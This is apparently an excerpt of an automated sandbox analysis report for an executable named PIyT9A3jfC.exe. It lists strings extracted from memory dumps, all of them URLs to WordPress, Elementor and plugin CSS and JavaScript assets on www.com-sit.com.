                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/css/jet-elements-skin.css?ver=2.6.11
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/css/jet-elements.css?ver=2.6.11
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/js/jet-elements.min.js?ver=2.6.11
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/js/lib/slick/slick.min.js?ver=1.8.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/premium-addons-for-elementor/assets/frontend/min-js/headro
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/premium-addons-for-elementor/assets/frontend/min-js/lottie
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/premium-addons-for-elementor/assets/frontend/min-js/premiu
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor-child/ctc-style.css?ver=2.7.1.1683646291
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor/assets/js/hello-frontend.min.js?ver=1.0.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor/style.min.css?ver=2.8.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.8.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/custom-jet-blocks.css?ver=1.3.6
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/global.css?ver=1689088515
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-11.css?ver=1689088516
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-1395.css?ver=1689088517
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-42.css?ver=1689089294
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-46.css?ver=1689088516
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-6.css?ver=1689088514
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-638.css?ver=1689088517
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/premium-addons-elementor/pa-frontend-2947ecb72.min.css?ver
